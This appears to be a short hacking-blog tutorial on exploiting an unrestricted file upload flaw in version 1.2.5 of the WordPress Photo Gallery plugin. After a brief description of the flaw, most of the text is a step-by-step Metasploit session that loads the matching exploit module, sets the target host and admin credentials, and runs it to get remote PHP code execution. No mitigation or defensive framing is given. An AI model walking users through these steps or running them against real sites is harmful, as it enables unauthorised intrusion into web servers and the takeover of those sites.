Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.

Exploit Targets
Photo Gallery Plugin, version 1.2.5.

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit     

0 comments:

Post a Comment